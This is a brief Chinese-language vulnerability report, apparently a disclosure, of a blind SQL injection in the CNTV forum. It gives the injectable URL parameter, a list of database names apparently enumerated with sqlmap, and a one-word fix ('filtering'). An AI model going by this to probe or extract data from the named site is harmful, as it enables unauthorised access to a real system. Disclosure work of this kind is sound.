中国网络电视台存在严重sql注入漏洞,
官网论坛存在sql盲注~~这个太致命了
http://bbs.cntv.cn
漏洞链接:
http://bbs.cntv.cn/cctvapi/Comment/english.php?id=数据库:
available databases [14]:
[*] bak
[*] cctv_0922
[*] cctv_1012
[*] cctv_1101
[*] cctv_2010
[*] cntv_bbs
[*] cntv_bbs_3
[*] cntv_bbs_tmp
[*] discuz
[*] information_scoema
[*] mysql
[*] qr_admin
[*] test
[*] vote
当前库:cntv_bbs
由于盲注,工具没跑出表,手工太麻烦了,而且只是检测,所以就点到为止!
修复方案:
过滤